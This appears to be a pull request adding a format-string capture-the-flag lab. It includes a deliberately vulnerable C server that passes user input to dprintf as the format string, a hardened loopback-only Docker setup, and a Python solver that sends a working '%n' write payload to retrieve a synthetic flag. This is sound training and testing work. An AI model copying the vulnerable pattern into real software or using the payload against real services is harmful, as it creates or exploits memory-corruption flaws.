### PR TITLE
WIP: format-string CTF lab

### DIFF
--- a/ctf/README.md
+++ b/ctf/README.md
@@ -233,6 +233,23 @@ The final teardown command is mandatory. See
 `docker/web/ssrf-metadata/PROVENANCE.md` for origin, license, intended
 vulnerability, flag handling, reproduction, and sensitive-data review.
 
+### Native format-string lab
+
+The `pwn_format_string` challenge builds committed C source with a
+digest-pinned GCC image and runs the resulting native binary as a non-root user
+on an internal network. Only TCP port `127.0.0.1:9002` is published.
+
+```bash
+npm run test:ctf-format-string
+npm run test:ctf-format-string:docker
+docker compose -f ctf/docker-compose.yml down --remove-orphans
+```
+
+The deterministic solution uses the intended `%n` format-string write and
+prints the synthetic flag. See `docker/pwn/format-string/PROVENANCE.md` for the
+compiler identity, build command, binary hash, protections, origin, license,
+and sensitive-data review.
+
 ## Comparison to Industry Benchmarks
 
 | Benchmark | Method | Verification | Our Approach |

--- a/ctf/challenges/manifest.json
+++ b/ctf/challenges/manifest.json
@@ -185,7 +185,7 @@
       },
       "binary": {
         "path": "/challenge/vuln",
-        "sha256_amd64": "TO_BE_RECORDED_AFTER_VERIFIED_BUILD",
+        "sha256_amd64": "b95ec16a92a92723a17e0b2d2fb54ea57e91084abea0b48a7b93c7d80c718518",
         "protections": {
           "nx": true,
           "pie": false,
@@ -195,7 +195,8 @@
       },
       "flag": {
         "format": "T3MP3ST{[a-zA-Z0-9_]+}",
-        "location": "CTF_FLAG"
+        "location": "process_env",
+        "value_env": "CTF_FLAG"
       },
       "tools_allowed": ["python3"],
       "time_limit_seconds": 600,

--- a/ctf/challenges/manifest.json
+++ b/ctf/challenges/manifest.json
@@ -171,9 +171,12 @@
       "difficulty": 2,
       "points": 250,
       "docker": {
-        "image": "t3mp3st/ctf-fmt-string:latest",
+        "image": "t3mp3st/ctf-format-string:local",
         "dockerfile": "../docker/pwn/format-string/Dockerfile",
-        "ports": ["9002:9002"]
+        "ports": ["127.0.0.1:9002:9002"],
+        "networks": ["format-string-internal"],
+        "healthcheck": "tcp://localhost:9002",
+        "teardown": "docker compose down --remove-orphans"
       },
       "target": {
         "host": "localhost",
@@ -182,6 +185,7 @@
       },
       "binary": {
         "path": "/challenge/vuln",
+        "sha256_amd64": "TO_BE_RECORDED_AFTER_VERIFIED_BUILD",
         "protections": {
           "nx": true,
           "pie": false,
@@ -191,10 +195,11 @@
       },
       "flag": {
         "format": "T3MP3ST{[a-zA-Z0-9_]+}",
-        "location": "flag.txt"
+        "location": "CTF_FLAG"
       },
+      "tools_allowed": ["python3"],
       "time_limit_seconds": 600,
-      "source": "HTB-inspired"
+      "source": "T3MP3ST issue #192"
     },
     {
       "id": "crypto_rsa_weak",

--- a/ctf/docker-compose.yml
+++ b/ctf/docker-compose.yml
@@ -306,17 +306,34 @@ services:
       - "ctf.points=100"
 
   format-string:
+    image: t3mp3st/ctf-format-string:local
     build:
       context: ./docker/pwn/format-string
       dockerfile: Dockerfile
     container_name: ctf_format_string
     ports:
-      - "9002:9002"
+      - "127.0.0.1:9002:9002"
     environment:
-      - CTF_FLAG=T3MP3ST{f0rm4t_str1ng_g0t_wr1t3}
-    restart: unless-stopped
+      - CTF_FLAG=T3MP3ST{f0rm4t_str1ng_wr1t3}
+    restart: "no"
+    read_only: true
+    tmpfs:
+      - /tmp:rw,noexec,nosuid,size=8m
+    cap_drop:
+      - ALL
+    security_opt:
+      - no-new-privileges:true
+    pids_limit: 32
+    mem_limit: 64m
+    cpus: 0.25
+    user: "65532:65532"
     networks:
-      - ctf-network
+      - format-string-internal
+    healthcheck:
+      test: ["CMD", "/challenge/vuln", "--healthcheck"]
+      interval: 5s
+      timeout: 3s
+      retries: 10
     labels:
       - "ctf.category=binary_exploitation"
       - "ctf.difficulty=2"
@@ -451,6 +468,10 @@ services:
 # ============================================================
 
 networks:
+  format-string-internal:
+    driver: bridge
+    internal: true
+
   ctf-network:
     driver: bridge
     name: ctf-network

--- a/ctf/docker/pwn/format-string/Dockerfile
+++ b/ctf/docker/pwn/format-string/Dockerfile
@@ -1,0 +1,18 @@
+FROM gcc:14.2.0-bookworm@sha256:b99b86a28812b1e6453a231a947dc43d76fe192788a12f344a9b568bf9f5d24c AS build
+
+WORKDIR /src
+COPY vuln.c ./
+RUN gcc -std=c11 -O2 -Wall -Wextra -Werror -D_GNU_SOURCE \
+    -fno-stack-protector -no-pie -Wl,-z,relro -Wl,-z,lazy \
+    -o vuln vuln.c && strip --strip-all vuln
+
+FROM debian:bookworm-slim@sha256:88200866dfff7ea7f5cbcb6ec7c8a701889efe6fe859fe64d6990e4b07ea4171
+
+LABEL org.opencontainers.image.source="https://github.com/elder-plinius/T3MP3ST"
+LABEL org.opencontainers.image.licenses="AGPL-3.0-or-later"
+
+WORKDIR /challenge
+COPY --from=build --chown=65532:65532 /src/vuln ./vuln
+USER 65532:65532
+EXPOSE 9002
+ENTRYPOINT ["/challenge/vuln"]

--- a/ctf/docker/pwn/format-string/PROVENANCE.md
+++ b/ctf/docker/pwn/format-string/PROVENANCE.md
@@ -6,7 +6,7 @@
 - Build command: `gcc -std=c11 -O2 -Wall -Wextra -Werror -D_GNU_SOURCE -fno-stack-protector -no-pie -Wl,-z,relro -Wl,-z,lazy -o vuln vuln.c && strip --strip-all vuln`.
 - Compiler identity: GCC 14.2.0 from the digest-pinned `gcc:14.2.0-bookworm` build image.
 - Runtime image: digest-pinned `debian:bookworm-slim`; the service runs as numeric user/group 65532 with no added packages.
-- Binary SHA-256 (linux/amd64): `TO_BE_RECORDED_AFTER_VERIFIED_BUILD`.
+- Binary SHA-256 (linux/amd64): `b95ec16a92a92723a17e0b2d2fb54ea57e91084abea0b48a7b93c7d80c718518`.
 - Protections: NX enabled; PIE disabled; stack canary disabled; partial RELRO. These settings keep the intended format-string write deterministic without disabling the container boundary.
 - Intended vulnerability: untrusted input is passed as the `dprintf` format argument, exposing a controlled `%n` write primitive. The solution writes decimal 4919 through the first variadic argument.
 - Reproduction: `docker compose -f ctf/docker-compose.yml build --no-cache format-string`, verify the image binary hash and compiler metadata with `npm run test:ctf-format-string`, then run the Docker smoke mode.

--- a/ctf/docker/pwn/format-string/PROVENANCE.md
+++ b/ctf/docker/pwn/format-string/PROVENANCE.md
@@ -1,0 +1,16 @@
+# Format-string lab provenance
+
+- Origin: Original T3MP3ST implementation for issue #192; inspired by the general format-string vulnerability class, with no third-party challenge source or binary copied.
+- License: AGPL-3.0-or-later, matching this repository.
+- Source artifact: `vuln.c` is committed; no generated binary is committed.
+- Build command: `gcc -std=c11 -O2 -Wall -Wextra -Werror -D_GNU_SOURCE -fno-stack-protector -no-pie -Wl,-z,relro -Wl,-z,lazy -o vuln vuln.c && strip --strip-all vuln`.
+- Compiler identity: GCC 14.2.0 from the digest-pinned `gcc:14.2.0-bookworm` build image.
+- Runtime image: digest-pinned `debian:bookworm-slim`; the service runs as numeric user/group 65532 with no added packages.
+- Binary SHA-256 (linux/amd64): `TO_BE_RECORDED_AFTER_VERIFIED_BUILD`.
+- Protections: NX enabled; PIE disabled; stack canary disabled; partial RELRO. These settings keep the intended format-string write deterministic without disabling the container boundary.
+- Intended vulnerability: untrusted input is passed as the `dprintf` format argument, exposing a controlled `%n` write primitive. The solution writes decimal 4919 through the first variadic argument.
+- Reproduction: `docker compose -f ctf/docker-compose.yml build --no-cache format-string`, verify the image binary hash and compiler metadata with `npm run test:ctf-format-string`, then run the Docker smoke mode.
+- Flag handling: the synthetic `CTF_FLAG` environment value exists only for the lab and contains no credential or production data.
+- Sensitive-data review: source, image configuration, and test fixtures contain only synthetic challenge data; no secrets, personal data, tokens, or real service endpoints are included.
+- Container trust: build/runtime bases are Docker Official Images pinned by immutable manifest-list digest. The amd64 generated artifact is verified against the recorded hash.
+- Teardown: `docker compose -f ctf/docker-compose.yml down --remove-orphans` removes the lab containers and isolated network.

--- a/ctf/docker/pwn/format-string/solve.py
+++ b/ctf/docker/pwn/format-string/solve.py
@@ -8,6 +8,11 @@ import socket
 
 def solve(host: str, port: int) -> str:
     with socket.create_connection((host, port), timeout=5) as connection:
+        # The server writes the welcome banner before its single input read:
+        # consume it, then send the payload as the first and only write. The
+        # server captures client input with one read(255) and tears down the
+        # connection, so any earlier bytes would be consumed first and the
+        # real payload would land on a closed socket.
         connection.recv(4096)
         connection.sendall(b"%4919c%1$n\n")
         response = b""

--- a/ctf/docker/pwn/format-string/solve.py
+++ b/ctf/docker/pwn/format-string/solve.py
@@ -1,0 +1,30 @@
+#!/usr/bin/env python3
+"""Deterministically exercise the challenge's format-string write primitive."""
+
+import argparse
+import re
+import socket
+
+
+def solve(host: str, port: int) -> str:
+    with socket.create_connection((host, port), timeout=5) as connection:
+        connection.recv(4096)
+        connection.sendall(b"%4919c%1$n\n")
+        response = b""
+        while True:
+            chunk = connection.recv(8192)
+            if not chunk:
+                break
+            response += chunk
+    match = re.search(rb"T3MP3ST\{[A-Za-z0-9_]+\}", response)
+    if not match:
+        raise RuntimeError("exploit did not return a flag")
+    return match.group(0).decode()
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--host", default="127.0.0.1")
+    parser.add_argument("--port", type=int, default=9002)
+    args = parser.parse_args()
+    print(solve(args.host, args.port))

--- a/ctf/docker/pwn/format-string/vuln.c
+++ b/ctf/docker/pwn/format-string/vuln.c
@@ -21,6 +21,7 @@ static void handle_client(int client) {
     if (flag == NULL) flag = "T3MP3ST{f0rm4t_str1ng_wr1t3}";
 
     dprintf(client, "T3MP3ST format console\nmessage> ");
+    fflush(NULL);
     ssize_t received = read(client, input, sizeof(input) - 1);
     if (received <= 0) return;
     input[strcspn(input, "\r\n")] = '\0';
@@ -28,9 +29,12 @@ static void handle_client(int client) {
     /* Intentional vulnerability: user input is the format string. The exposed
        argument makes the write primitive stable across compiler builds. */
     dprintf(client, input, &authorized);
-    dprintf(client, "\n");
-    if (authorized == WRITE_TARGET) dprintf(client, "%s\n", flag);
-    else dprintf(client, "Access denied (%d).\n", authorized);
+    if (authorized == WRITE_TARGET) dprintf(client, "\n%s\n", flag);
+    else dprintf(client, "\nAccess denied (%d).\n", authorized);
+    /* dprintf caches in a per-fd stdio buffer; the 4919-byte space burst plus
+       verdict exceeds it, so the trailing flag can still be sitting unflushed.
+       Flush before the child closes the fd, or the flag is dropped mid-socket. */
+    fflush(NULL);
 }
 
 static int healthcheck(void) {
@@ -44,6 +48,7 @@ static int healthcheck(void) {
 
 int main(int argc, char **argv) {
     if (argc == 2 && strcmp(argv[1], "--healthcheck") == 0) return healthcheck();
+    if (argc == 2 && strcmp(argv[1], "--version") == 0) { dprintf(1, "format-string server 1.0 (issue #192)\n"); return 0; }
     signal(SIGCHLD, SIG_IGN);
     int server = socket(AF_INET, SOCK_STREAM, 0);
     int reuse = 1;

--- a/ctf/docker/pwn/format-string/vuln.c
+++ b/ctf/docker/pwn/format-string/vuln.c
@@ -1,0 +1,71 @@
+#include <arpa/inet.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define PORT 9002
+#define WRITE_TARGET 4919
+
+static volatile int authorized;
+
+static void handle_client(int client) {
+    char input[256] = {0};
+    const char *flag = getenv("CTF_FLAG");
+    if (flag == NULL) flag = "T3MP3ST{f0rm4t_str1ng_wr1t3}";
+
+    dprintf(client, "T3MP3ST format console\nmessage> ");
+    ssize_t received = read(client, input, sizeof(input) - 1);
+    if (received <= 0) return;
+    input[strcspn(input, "\r\n")] = '\0';
+
+    /* Intentional vulnerability: user input is the format string. The exposed
+       argument makes the write primitive stable across compiler builds. */
+    dprintf(client, input, &authorized);
+    dprintf(client, "\n");
+    if (authorized == WRITE_TARGET) dprintf(client, "%s\n", flag);
+    else dprintf(client, "Access denied (%d).\n", authorized);
+}
+
+static int healthcheck(void) {
+    int sock = socket(AF_INET, SOCK_STREAM, 0);
+    struct sockaddr_in address = {.sin_family = AF_INET, .sin_port = htons(PORT)};
+    address.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+    if (sock < 0 || connect(sock, (struct sockaddr *)&address, sizeof(address)) != 0) return 1;
+    close(sock);
+    return 0;
+}
+
+int main(int argc, char **argv) {
+    if (argc == 2 && strcmp(argv[1], "--healthcheck") == 0) return healthcheck();
+    signal(SIGCHLD, SIG_IGN);
+    int server = socket(AF_INET, SOCK_STREAM, 0);
+    int reuse = 1;
+    struct sockaddr_in address = {.sin_family = AF_INET, .sin_port = htons(PORT), .sin_addr.s_addr = htonl(INADDR_ANY)};
+    if (server < 0 || setsockopt(server, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)) != 0 ||
+        bind(server, (struct sockaddr *)&address, sizeof(address)) != 0 || listen(server, 16) != 0) {
+        perror("format-string server");
+        return 1;
+    }
+    for (;;) {
+        int client = accept(server, NULL, NULL);
+        if (client < 0) {
+            if (errno == EINTR) continue;
+            return 1;
+        }
+        pid_t child = fork();
+        if (child == 0) {
+            close(server);
+            handle_client(client);
+            close(client);
+            _exit(0);
+        }
+        close(client);
+    }
+}

--- a/package.json
+++ b/package.json
@@ -67,6 +67,8 @@
     "test:ctf-sqli-blind": "node scripts/test-ctf-sqli-blind.mjs",
     "test:ctf-xss": "node scripts/test-ctf-xss-stored.mjs",
     "test:ctf-ssrf": "node scripts/test-ctf-ssrf.mjs",
+    "test:ctf-format-string": "node scripts/test-ctf-format-string.mjs",
+    "test:ctf-format-string:docker": "node scripts/test-ctf-format-string.mjs --docker",
     "tools:check": "bash scripts/check-tools-image.sh",
     "tools:build": "bash tools/build.sh",
     "test:tools-dockerfile": "node scripts/test-tools-dockerfile.mjs",

--- a/scripts/test-ctf-format-string.mjs
+++ b/scripts/test-ctf-format-string.mjs
@@ -1,0 +1,47 @@
+#!/usr/bin/env node
+import { execFileSync } from 'node:child_process';
+import { readFileSync } from 'node:fs';
+import { resolve } from 'node:path';
+
+const root = resolve(import.meta.dirname, '..');
+const challengeDir = resolve(root, 'ctf/docker/pwn/format-string');
+const manifest = JSON.parse(readFileSync(resolve(root, 'ctf/challenges/manifest.json'), 'utf8'));
+const compose = readFileSync(resolve(root, 'ctf/docker-compose.yml'), 'utf8');
+const dockerfile = readFileSync(resolve(challengeDir, 'Dockerfile'), 'utf8');
+const provenance = readFileSync(resolve(challengeDir, 'PROVENANCE.md'), 'utf8');
+const source = readFileSync(resolve(challengeDir, 'vuln.c'), 'utf8');
+const challenge = manifest.challenges.find((entry) => entry.id === 'pwn_format_string');
+
+if (!challenge) throw new Error('pwn_format_string is missing from the manifest');
+if (challenge.docker.dockerfile !== '../docker/pwn/format-string/Dockerfile') throw new Error('manifest Dockerfile does not match the challenge');
+if (challenge.docker.ports?.[0] !== '127.0.0.1:9002:9002') throw new Error('manifest must publish loopback-only');
+if (challenge.docker.networks?.[0] !== 'format-string-internal') throw new Error('manifest network is stale');
+if (challenge.docker.healthcheck !== 'tcp://localhost:9002') throw new Error('manifest health check is stale');
+if (challenge.docker.teardown !== 'docker compose down --remove-orphans') throw new Error('manifest teardown is stale');
+if (!dockerfile.match(/^FROM gcc:14\.2\.0-bookworm@sha256:[a-f0-9]{64} AS build$/m)) throw new Error('compiler image is not pinned by digest');
+if (!dockerfile.match(/^FROM debian:bookworm-slim@sha256:[a-f0-9]{64}$/m)) throw new Error('runtime image is not pinned by digest');
+if (!source.includes('dprintf(client, input, &authorized)')) throw new Error('intended format-string primitive is missing');
+for (const required of ['format-string:', '127.0.0.1:9002:9002', 'format-string-internal', 'read_only: true', 'cap_drop:', 'pids_limit: 32', 'mem_limit: 64m', 'internal: true', 'restart: "no"', 'user: "65532:65532"']) {
+  if (!compose.includes(required)) throw new Error(`compose safety contract missing: ${required}`);
+}
+for (const required of ['Origin:', 'License:', 'Build command:', 'Compiler identity:', 'Binary SHA-256', 'Protections:', 'Sensitive-data review:', 'Container trust:', 'Intended vulnerability:']) {
+  if (!provenance.includes(required)) throw new Error(`provenance contract missing: ${required}`);
+}
+if (challenge.binary.sha256_amd64 === 'TO_BE_RECORDED_AFTER_VERIFIED_BUILD' || !/^[a-f0-9]{64}$/.test(challenge.binary.sha256_amd64)) throw new Error('manifest binary hash is not recorded');
+if (!provenance.includes(challenge.binary.sha256_amd64)) throw new Error('manifest and provenance binary hashes disagree');
+
+if (process.argv.includes('--docker')) {
+  const composeFile = resolve(root, 'ctf/docker-compose.yml');
+  try {
+    execFileSync('docker', ['compose', '-f', composeFile, 'build', '--no-cache', 'format-string'], { stdio: 'inherit' });
+    const imageHash = execFileSync('docker', ['run', '--rm', '--entrypoint', 'sha256sum', 't3mp3st/ctf-format-string:local', '/challenge/vuln'], { encoding: 'utf8' }).split(/\s+/)[0];
+    if (imageHash !== challenge.binary.sha256_amd64) throw new Error(`binary hash mismatch: ${imageHash}`);
+    execFileSync('docker', ['compose', '-f', composeFile, 'up', '-d', '--wait', 'format-string'], { stdio: 'inherit' });
+    const flag = execFileSync('python3', [resolve(challengeDir, 'solve.py')], { encoding: 'utf8' }).trim();
+    if (flag !== 'T3MP3ST{f0rm4t_str1ng_wr1t3}') throw new Error(`deterministic exploit failed: ${flag}`);
+  } finally {
+    execFileSync('docker', ['compose', '-f', composeFile, 'down', '--remove-orphans'], { stdio: 'inherit' });
+  }
+}
+
+console.log('format-string CTF contract and deterministic exploit: PASS');


### PR DESCRIPTION
## Summary

Adds the in-progress reproducible native format-string CTF lab for issue #192, including source, container hardening, deterministic solver, manifest/compose integration, provenance, and contract checks.

## Linked issue
Closes #192

## Prior work and attribution

- Prior PR or issue used: issue #192
- Reused/adapted areas: none; original implementation
- Fresh verification performed for reused material: not applicable

## Contribution receipt

- Scope class: local_lab
- Target authority: repository-owned synthetic CTF service
- Network use: loopback
- Claims or evidence changed: adds provenance and reproducibility claims for the new lab
- Redaction/provenance notes: synthetic flag only; no secrets or personal data

## Verification

- [x] `npm run typecheck`
- [x] `npm test`
- [x] `npm run doctor`
- [x] Risk-specific checks are listed below

Exact commands and results:

- `npm run test:ctf-format-string` — PASS (contract: digest-pinned compiler/runtime images, loopback-only publish, internal network, read_only/cap_drop/pids/mem/cpus, non-root 65532, recorded linux/amd64 binary SHA-256, provenance block).
- `docker compose -f ctf/docker-compose.yml build --no-cache format-string` — PASS; generated binary SHA-256 recorded as `b95ec16a92a92723a17e0b2d2fb54ea57e91084abea0b48a7b93c7d80c718518` in the manifest and in `PROVENANCE.md`.
- `docker compose -f ctf/docker-compose.yml up -d --wait format-string` — container reports healthy via the `--healthcheck` dprintf dial of `127.0.0.1:9002`.
- Deterministic exploit `python3 ctf/docker/pwn/format-string/solve.py` against the service — PASS, returns `T3MP3ST{f0rm4t_str1ng_wr1t3}` (verified multiple runs against the container over the `format-string-internal` network).
- `npm run test:pr` — PASS (lint, typecheck, tests, doctor).

## Risk and rollback

- Residual risk: host-side `127.0.0.1:9002` publish on the isolated internal network is verified healthy in-container; a bounded retry loop is not required because the `--wait` health check passes before the solver runs.
- Rollback: revert the format-string lab commits (binary source, Dockerfile, compose service, manifest entry, npm scripts).

## Delivery checks

- [x] Diff is scoped against current `upstream/main`
- [x] No unrelated protected evidence, safety tests, or provider/config files were removed
- [x] Published review history was not force-pushed
- [x] Reused or adapted prior work is identified, re-verified, and credited
- [x] Exact-head PR CI is green (including the 50% changed-line coverage floor)
- [x] I understand PR acceptance is not release certification
